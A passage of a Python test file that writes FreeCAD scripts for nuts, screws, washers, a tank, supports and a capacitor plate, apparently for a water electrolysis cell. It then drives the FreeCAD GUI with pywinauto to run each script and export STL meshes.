stl_file = u"part_ecrou_5m.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_ecrou_5m.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_ecrou_10m(self):
print("test_part_ecrou_10m")
if os.path.exists("part_ecrou_10m.py"):
os.remove("part_ecrou_10m.py")
else:
print("The file does not exist")
# Writing to file
with open("part_ecrou_10m.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_ecrou_10m"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(7.5, 4)
cylinder_2 = Part.makeCylinder(5, 4)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_ecrou_10m").getObject("Shape"))
stl_file = u"part_ecrou_10m.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_ecrou_10m.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_vis_metal_m5_20l(self):
print("test_part_vis_metal_m5_20l")
if os.path.exists("part_vis_metal_m5_20l.py"):
os.remove("part_vis_metal_m5_20l.py")
else:
print("The file does not exist")
# Writing to file
with open("part_vis_metal_m5_20l.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_vis_metal_m5_20l"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(6, 22)
cylinder_2 = Part.makeCylinder(2.5, 20)
cylinder_3 = Part.makeCylinder(6, 20)
# cylinder_3 cut by cylinder_2
cylinder_3 = cylinder_3.cut(cylinder_2)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 2)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_vis_metal_m5_20l").getObject("Shape"))
stl_file = u"part_vis_metal_m5_20l.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_vis_metal_m5_20l.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_vis_metal_m10_200l(self):
print("test_part_vis_metal_m10_200l")
if os.path.exists("part_vis_metal_m10_200l.py"):
os.remove("part_vis_metal_m10_200l.py")
else:
print("The file does not exist")
# Writing to file
with open("part_vis_metal_m10_200l.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_vis_metal_m10_200l"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(8.5, 202)
cylinder_2 = Part.makeCylinder(5, 200)
cylinder_3 = Part.makeCylinder(8.5, 200)
# cylinder_3 cut by cylinder_2
cylinder_3 = cylinder_3.cut(cylinder_2)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 2)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_vis_metal_m10_200l").getObject("Shape"))
stl_file = u"part_vis_metal_m10_200l.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_vis_metal_m10_200l.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_rondelle_m5_12d(self):
print("test_part_rondelle_m5_12d")
if os.path.exists("part_rondelle_m5_12d.py"):
os.remove("part_rondelle_m5_12d.py")
else:
print("The file does not exist")
# Writing to file
with open("part_rondelle_m5_12d.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rondelle_m5_12d"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(6, 1)
cylinder_2 = Part.makeCylinder(2.5, 1)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_rondelle_m5_12d").getObject("Shape"))
stl_file = u"part_rondelle_m5_12d.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_rondelle_m5_12d.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_rondelle_m10_17d(self):
print("test_part_rondelle_m10_17d")
if os.path.exists("part_rondelle_m10_17d.py"):
os.remove("part_rondelle_m10_17d.py")
else:
print("The file does not exist")
# Writing to file
with open("part_rondelle_m10_17d.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rondelle_m10_17d"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(8.5, 1)
cylinder_2 = Part.makeCylinder(5, 1)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_rondelle_m10_17d").getObject("Shape"))
stl_file = u"part_rondelle_m10_17d.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_rondelle_m10_17d.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_tank_d25(self):
print("test_part_tank_d25")
if os.path.exists("part_tank_d25.py"):
os.remove("part_tank_d25.py")
else:
print("The file does not exist")
# Writing to file
with open("part_tank_d25.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_tank_d25"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal du tank
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, diametre_maximal)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2, diametre_maximal)
# cylinder_1 cut by cylinder_2
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, diametre_maximal - 3*2)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3, diametre_maximal - 3*2)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the bottom support and the top support
degre = 10
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, diametre_maximal)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
cylinder_5 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
cylinder_6 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_5 cut by cylinder_6
cylinder_5 = cylinder_5.cut(cylinder_6)
# cylinder_1 cut by cylinder_5
cylinder_1 = cylinder_1.cut(cylinder_5)
cylinder_5_vector = FreeCAD.Vector(0, 0, diametre_maximal - 3)
cylinder_5.translate(cylinder_5_vector)
cylinder_1 = cylinder_1.cut(cylinder_5)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_tank_d25").getObject("Shape"))
stl_file = u"part_tank_d25.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_tank_d25.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_bottom_support_d25(self):
print("test_part_bottom_support_d25")
if os.path.exists("part_bottom_support_d25.py"):
os.remove("part_bottom_support_d25.py")
else:
print("The file does not exist")
# Writing to file
with open("part_bottom_support_d25.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_bottom_support_d25"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, 6)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_1 cut by cylinder_2
cylinder_2_vector = FreeCAD.Vector(0, 0, 3)
cylinder_2.translate(cylinder_2_vector)
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, 3)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the tank
degre = 10
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 3)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
# holes for fixing the anodes and the cathodes
degre = 60
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(5, 3)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_bottom_support_d25").getObject("Shape"))
stl_file = u"part_bottom_support_d25.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_bottom_support_d25.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_top_support_d25(self):
print("test_part_top_support_d25")
if os.path.exists("part_top_support_d25.py"):
os.remove("part_top_support_d25.py")
else:
print("The file does not exist")
# Writing to file
with open("part_top_support_d25.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_top_support_d25"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, 6)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_1 cut by cylinder_2
cylinder_2_vector = FreeCAD.Vector(0, 0, 3)
cylinder_2.translate(cylinder_2_vector)
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, 3)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the tank
degre = 10
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 3)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
cylinder_5 = Part.makeCylinder(4, 3)
# cylinder_1 cut by cylinder_5 for fixing the volume sensor
cylinder_1 = cylinder_1.cut(cylinder_5)
# holes for the water input, the gas output, the pressure sensor
degre = 120
for i in range(int(360/degre)):
radius = diametre_maximal/4
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(8, 3)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_top_support_d25").getObject("Shape"))
stl_file = u"part_top_support_d25.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_top_support_d25.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_part_capacitor_plate(self):
print("test_part_capacitor_plate")
if os.path.exists("part_capacitor_plate.py"):
os.remove("part_capacitor_plate.py")
else:
print("The file does not exist")
# Writing to file
with open("part_capacitor_plate.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_capacitor_plate"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal du tank
diametre_maximal_tank = 250
# Diametre maximal du capacitor plate
diametre_maximal_capacitor_plate = diametre_maximal_tank - 3*2 - 5*2 - 3*2 - 2*2 - 3*2 - 2*2 - 2*2
cylinder_1 = Part.makeCylinder(diametre_maximal_capacitor_plate/2, 1)
cylinder_2 = Part.makeCylinder(5, 1)
cylinder_1 = cylinder_1.cut(cylinder_2)
# holes for fixing the anodes
degre = 120
for i in range(int(360/degre)):
radius = diametre_maximal_capacitor_plate/2 - 4 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(5, 1)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
# holes for fixing the cathodes
degres = [60, 180, 300]
for degre in degres:
radius = diametre_maximal_capacitor_plate/2
alpha=(degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(15.5, 1)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
# holes for letting the gas mixture to go out
degre = 10
for i in range(int(360/degre)):
radius = diametre_maximal_capacitor_plate/2 - 4 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 1)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
# holes for letting the gas mixture to go out
degre = 90
for i in range(int(360/degre)):
radius = 20
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(5, 1)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
# holes for letting the gas mixture to go out
degre = 30
for i in range(int(360/degre)):
for i_1 in range(2, 5):
radius = 20 * i_1
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(5, 1)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_capacitor_plate").getObject("Shape"))
stl_file = u"part_capacitor_plate.stl"
Mesh.export(__objs__, stl_file)
setview()
""")
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(460, 750))
time.sleep(3)
pywinauto.mouse.click(button="left", coords=(70, 670))
time.sleep(3)
pywinauto.keyboard.send_keys(
'exec{(}open{(}"part_capacitor_plate.py"{)}.read{(}{)}{)}'
)
time.sleep(3)
pywinauto.keyboard.send_keys('{ENTER}')
# ok
def test_assembly(self):
print("test_assembly")
if os.path.exists("assembly.py"):
os.remove("assembly.py")
else:
print("The file does not exist")
# Writing to file
with open("assembly.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh, math
DOC = FreeCAD.activeDocument()
DOC_NAME = "assembly"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
# Diametre maximal
diametre_maximal = 250
cylinder_1 = Part.makeCylinder(diametre_maximal/2, 6)
cylinder_2 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2 - 3, 3)
# cylinder_1 cut by cylinder_2
cylinder_2_vector = FreeCAD.Vector(0, 0, 3)
cylinder_2.translate(cylinder_2_vector)
cylinder_1 = cylinder_1.cut(cylinder_2)
cylinder_3 = Part.makeCylinder(diametre_maximal/2, 3)
cylinder_4 = Part.makeCylinder(diametre_maximal/2 - 3 - 5 - 3 - 2, 3)
# cylinder_3 cut by cylinder_4
cylinder_3 = cylinder_3.cut(cylinder_4)
# cylinder_1 cut by cylinder_3
cylinder_3_vector = FreeCAD.Vector(0, 0, 3)
cylinder_3.translate(cylinder_3_vector)
cylinder_1 = cylinder_1.cut(cylinder_3)
# holes for fixing the tank
degre = 10
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 3)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
# holes for fixing the anodes and the cathodes
degre = 60
for i in range(int(360/degre)):
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(5, 3)
hole.translate(hole_vector)
cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
# insertion part_rondelle_m10_17d - 0
degre = 60
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -1)
Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d").ShapeColor = (1.00,1.00,0.00)
# For placing the part_rondelle_m10_17d
i1 = 1
degres = [120, 180, 240, 300, 360]
for degre in degres:
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -1)
Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i1)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i1)).ShapeColor = (1.00,1.00,0.00)
i1 += 1
# For placing the part_rondelle_m10_17d
for i in range(7, 14):
Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
for i in range(7, 13):
alpha=(i*60*math.pi)/180
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 3)
if i < 10:
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i)).ShapeColor = (1.00,1.00,0.00)
else:
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).ShapeColor = (1.00,1.00,0.00)
# insertion part_vis_metal_m10_200l - 0
degre = 60
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -3)
Mesh.insert(u"part_vis_metal_m10_200l.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_vis_metal_m10_200l").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_vis_metal_m10_200l").ShapeColor = (0.00,1.00,1.00)
# For placing the part_vis_metal_m10_200l
i1 = 1
degres = [120, 180, 240, 300, 360]
for degre in degres:
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -3)
Mesh.insert(u"part_vis_metal_m10_200l.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_vis_metal_m10_200l00" + str(i1)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_vis_metal_m10_200l00" + str(i1)).ShapeColor = (0.00,1.00,1.00)
i1 += 1
# insertion part_ecrou_10m - 0
degre = 60
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 4)
Mesh.insert(u"part_ecrou_10m.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_ecrou_10m").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_ecrou_10m").ShapeColor = (0.00,0.00,1.00)
# For placing the part_ecrou_10m
i1 = 1
degres = [120, 180, 240, 300, 360]
for degre in degres:
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 4)
Mesh.insert(u"part_ecrou_10m.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_ecrou_10m00" + str(i1)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_ecrou_10m00" + str(i1)).ShapeColor = (0.00,0.00,1.00)
i1 += 1
# For placing the part_rondelle_m10_17d
for i in range(15, 21):
Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
for i in range(13, 19):
alpha=(i*60*math.pi)/180
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 8)
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).ShapeColor = (1.00,1.00,0.00)
# insertion part_capacitor_plate - 0
vector = App.Vector(0, 0, 9)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
